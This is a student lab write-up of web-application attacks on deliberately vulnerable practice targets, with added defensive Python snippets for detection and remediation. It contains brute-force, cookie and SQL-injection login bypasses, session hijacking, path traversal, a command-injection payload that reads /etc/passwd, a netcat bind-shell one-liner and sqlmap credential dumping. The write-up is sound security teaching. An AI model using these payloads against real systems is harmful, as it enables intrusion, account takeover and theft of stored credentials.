
3) Build a site map using the application mentioned for analysis.

Site map for “testphp.vulnweb.com” using Burp Suite.


4) Experiment to perform web application mirroring using
“HTTrack”.
Mirroring the website at https://mdmusaibali.github.io/Travella

Step 1) Open HTTrack and click Next to start a new project.

Step 2) Give the project a name, choose a path to store the
downloaded files and click Next.

Step 3) Press the “Add URL” button, paste the URL of the website to
download and click OK.

Step 4) Once the URL is added, click Next.

Step 5) Keep the settings at their defaults and click Next.

Step 6) Wait until the website has finished downloading.

Step 7) You can browse the mirrored website by opening the HTML document in
your download location.
5) Build a checklist for authentication and apply on the web
application to analyze the outcomes.
Authentication Bypass via Brute Force
Turn on Intercept in Burp Suite and log in with any username and password on
the login form.

Send the intercepted request to Intruder for the brute-force attack.

Clear the payload positions to save time.

Add only two payload positions, i.e. username and password.

Set the attack type to Cluster bomb so that every combination of the two
payload sets is tried.

Add possible usernames and passwords, or a wordlist, to payload set 1 as well as
payload set 2 and start the attack.

We now get a 302 status for the request where payload 1 and payload 2 are both “admin”.
Let’s test these credentials on the login page.
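From the defender's side, the Intruder run above leaves a very recognisable trace in the web server's access log: a burst of POSTs to the login URL from one client, all answered with the form again, then a single 302. The detector below is an added example written for this page, not code from the lab or from Burp; the log lines are constructed samples, and the login path, window and threshold are assumptions you would tune to your own application.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed access-log sample in common log format (not captured from the lab):
# one client fires twelve POST /login attempts in twelve seconds, each answered
# with 200 (form re-rendered on failure), then one 302 (redirect on success, the
# status the Intruder run above flagged). A second client fails once and succeeds
# 35 seconds later, which must not be flagged.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.7 - - [12/Mar/2024:10:00:{i:02d} +0000] "POST /login HTTP/1.1" 200 512'
     for i in range(12)]
    + ['10.0.0.7 - - [12/Mar/2024:10:00:12 +0000] "POST /login HTTP/1.1" 302 0',
       '10.0.0.9 - - [12/Mar/2024:10:00:05 +0000] "POST /login HTTP/1.1" 200 512',
       '10.0.0.9 - - [12/Mar/2024:10:00:40 +0000] "POST /login HTTP/1.1" 302 0'])

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def detect_login_bruteforce(log_text, login_path="/login", window_seconds=30, threshold=10):
    """Sliding-window detector: flag a client once its failed logins inside the
    window reach `threshold`, and flag separately a success (302) that follows
    such a burst. Returns tuples (kind, ip, failures_in_window, timestamp)."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> timestamps of failed attempts in window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != login_path:
            continue
        ip, status = m["ip"], m["status"]
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[ip]
        while q and ts - q[0] > window:   # drop attempts older than the window
            q.popleft()
        if status == "302":               # success: only interesting after a burst
            if ip in flagged:
                alerts.append(("success-after-burst", ip, len(q), ts))
            continue
        q.append(ts)
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append(("burst", ip, len(q), ts))
    return alerts
```

The same counters drive the mitigation: once a client crosses the threshold, the login endpoint should throttle or lock that client (or that account) instead of continuing to answer every guess.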

Authentication Bypass via Cookies

Enter any username and password and press the Login button with Intercept on.
Add a new parameter with name=”uid” and value=”1” to the request and forward it.

We are logged in.


Authentication Bypass via SQL injection
A simple ' or 1=1# payload is enough to log us in as admin.
6) Build a checklist for session management and use the same to
perform manual checks on the application.
Session Mgmt. – Administrative Portals
Although the page is locked, we can alter the admin value in the URL.

Once we do that, the page is unlocked.


Session Mgmt. – Cookies (HTTPOnly)
Open bWAPP in Chrome or any other browser. Log in as bee/bug and
check the PHPSESSID by clicking the Cookies button. Copy that PHPSESSID and save it
somewhere.

Now open your Kali Linux machine and open both Burp Suite and bWAPP.
This time create a new user and log in with it. Turn on Intercept and click the
Cookies button.
Change the PHPSESSID in Burp Suite to the copied value and turn off Intercept.
Once you do that, you are logged into the other user's session.

Session Mgmt. – Cookies (Secure)


This can be exploited using the same method as in the previous section.

Session Mgmt. – Session ID in URL


The PHPSESSID is already exposed in the URL.
Just follow the same process as in the previous section, except that you won’t need Burp
Suite to paste the other session ID: you can paste it directly into
the URL.

Session Mgmt. – Strong Session


This vulnerability seems to be common as well. (not sure)
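The four session-management checks above (HttpOnly, Secure, session ID in the URL, session strength) all come down to inspecting the Set-Cookie header and the request URL, which is easy to automate. The checker below is an added example, not code from the lab or from bWAPP; the list of session cookie names, the "looks weak" heuristic and the hardened header it emits are assumptions for illustration.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Cookie names treated as session identifiers (PHPSESSID is the one bWAPP uses);
# extend for your own application.
SESSION_COOKIE_NAMES = {"phpsessid", "jsessionid", "sessionid", "session_id", "sid"}


def looks_weak(session_id):
    """Heuristic (an assumption, not a standard): short or purely numeric IDs
    are guessable; a real check collects many IDs and estimates their entropy."""
    return len(session_id) < 16 or session_id.isdigit()


def audit_set_cookie(header_value):
    """Findings for one Set-Cookie header value; an empty list means nothing found."""
    jar = SimpleCookie()
    jar.load(header_value)
    findings = []
    for name, morsel in jar.items():
        if name.lower() not in SESSION_COOKIE_NAMES:
            continue
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly (script can read it, so XSS steals the session)")
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure (sent over plain HTTP, sniffable)")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite (sent on cross-site requests)")
        if looks_weak(morsel.value):
            findings.append(f"{name}: session id looks guessable")
    return findings


def session_ids_in_url(url):
    """Names of session parameters carried in the query string: they end up in
    browser history, proxy logs and Referer headers, so they are trivially copied."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [p for p in params if p.lower() in SESSION_COOKIE_NAMES]


def hardened_set_cookie(session_id):
    """The header a login response should send for its session cookie; the
    application must also issue a fresh ID on every login (session regeneration)."""
    return f"PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"
```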
8) Experiment to perform SQL and NoSQL injection in application
using manual and automated tools.
Manual Method
A simple ' or 1=1# payload can expose all of the protected data on the server.
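The login bypass in section 5 and the data exposure here come from the same defect: user input concatenated into the SQL text. The pair of functions below is an added example, not code from the lab or from bWAPP; it uses an in-memory SQLite table with constructed rows, and because SQLite's comment marker is `--` rather than MySQL's `#`, the payload is written as `' or 1=1--`.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the application's users table (constructed rows).
    Plaintext passwords keep the demo short; a real table stores hashes, which
    by itself does nothing against this injection."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "s3cret-admin", "admin-only data"),
                      ("bee", "bug", "bee's data")])
    return conn


def login_vulnerable(conn, user, pwd):
    """The bug behind both sections: input pasted into the query text. The
    attacker's quote closes the string literal and the comment marker discards
    the password check, so the WHERE clause becomes login = '' or 1=1 and every
    row comes back. bWAPP runs on MySQL, where the marker is #; SQLite uses --."""
    sql = (f"SELECT login, secret FROM users "
           f"WHERE login = '{user}' AND password = '{pwd}'")
    return conn.execute(sql).fetchall()


def login_fixed(conn, user, pwd):
    """Bound parameters: the driver passes the values separately from the SQL
    text, so a quote in the input is just a character inside a string."""
    sql = "SELECT login, secret FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (user, pwd)).fetchall()
```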

Automated Method (using sqlmap)


9) Experiment to perform OS command injection in application and
extend the attack to gain web shell access.

Experimenting with OS command injection

We can use “;” to end the search command and start a new command of our own.
For example:
; cat /etc/passwd

Trying to gain shell access
Let’s get a shell using sh and listen with netcat on port 4444.
To run the shell and listen on the port at the same time we connect them through a
named pipe created with mkfifo.
So we’ll be using this command:
www.google.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Now return to Kali Linux and open a terminal.

Type:
nc 192.168.29.185 4444
to connect to port 4444 and get shell access.
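The “;” works above because the lookup form splices the user's text into a shell command line. The code below is an added example, not the lab application's code: it shows that pattern next to the fix (allow-list validation plus an argv list with no shell), and a small detection helper for logging requests that carry shell metacharacters. The `nslookup` command, the hostname rule and the sample input are assumptions for illustration.

```python
import re
import subprocess

# RFC 1123 hostname syntax: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen (so a value cannot start with "-"
# and be read as a command-line option either).
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")
SHELL_META = set(";|&$`<>(){}\n")

# Constructed input of the kind the lab sends: ";" ends the lookup, the rest runs.
SAMPLE_INPUT = "www.google.com; cat /etc/passwd"


def vulnerable_command(host):
    """The pattern behind the lab's bug: untrusted input spliced into a shell
    string that is then handed to os.system() or subprocess with shell=True."""
    return f"nslookup {host}"


def metachars_in(value):
    """Detection aid: which shell metacharacters an input carries (useful for
    request logging or a WAF rule, not as the only defence)."""
    return sorted(ch for ch in SHELL_META if ch in value)


def is_valid_hostname(value):
    """Allow-list check: True only for a syntactically valid hostname."""
    return bool(HOSTNAME_RE.match(value))


def hardened_argv(host):
    """Validate, then build an argv list for subprocess with no shell: even a
    metacharacter that slipped through would reach nslookup as a plain
    argument, never as a second command."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected lookup target {host!r}: not a hostname")
    return ["nslookup", host]


def lookup(host, timeout=5):
    """Run the validated lookup (needs network access, so not exercised here)."""
    result = subprocess.run(hardened_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout
```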
10) Build a checklist for file path traversal to access the server internal
files.
Pages are exposed in the URL itself

By adding a traversal payload to the URL we can read the server's internal files.
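A page parameter that names a file is safe only if the server resolves it under a fixed directory and refuses anything that escapes, after URL-decoding it the way the web server would. The helpers below are an added example, not the lab application's code; the directory, the allow-list of page names and the sample requests are assumptions for illustration.

```python
import os
from urllib.parse import unquote

# Constructed layout, not the lab server's: pages live under this directory and
# the "page" URL parameter names one of them.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home.php", "about.php", "contact.php"}


def resolve_page(base_dir, requested):
    """Decode the parameter, resolve it under base_dir and refuse anything that
    ends up outside. commonpath (not startswith) is used so that
    '/var/www/pages_old/x' is not accepted as being inside '/var/www/pages'."""
    name = unquote(requested)
    if "\x00" in name:                       # null byte: classic extension-check bypass
        raise PermissionError(f"null byte in page name: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path traversal attempt rejected: {requested!r}")
    return target


def resolve_page_allowlist(requested):
    """Stronger form when the set of pages is known: only a listed basename is
    accepted, so no path arithmetic is possible at all."""
    name = unquote(requested)
    if name not in ALLOWED_PAGES:
        raise PermissionError(f"unknown page {requested!r}")
    return os.path.join(PAGES_DIR, name)


def is_traversal(base_dir, requested):
    """Detection helper for request logs: True when the request would escape base_dir."""
    try:
        resolve_page(base_dir, requested)
    except PermissionError:
        return True
    return False
```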


ENUMERATION USING SQLMAP (AUTOMATED)
Tried to get the list of databases using the --dbs option in sqlmap.
The results asked me to add cookies and also give parameters.

Tried to find any clue in the -h section and got to know that I can add cookies and parameters to
the command using the --cookies and --data options.
Extracted cookies and data from Burp Suite.

Used those cookies and data in sqlmap and tried to find databases.

Results:

Results indicated that there was only one database, i.e. information_schema, although the
database “information_schema” was the default database made by MySQL. This seemed fishy.
Tried to get the current database being used through the --current-db command.

Results:

Results indicated that the current database was “bwapp”, which was contrary to the previous
result saying there was only one database.
Although it wasn’t a good idea, tried to dump the databases to see if I could find something new.

Results:

Results gave the tables of our current database, i.e. “bwapp”, along with the columns of the table
named “blog” inside “bwapp”.

Then tried to find the columns of the table “users” through the --column option, selecting the “bwapp”
database using -D and the “users” table using -T, because it sounded as if it had something
important.

Results:
Results displayed the columns from the table “user”.

Tried dumping a few columns to find the credentials (if available).

Results:

Exposed all the emails along with login IDs and passwords.
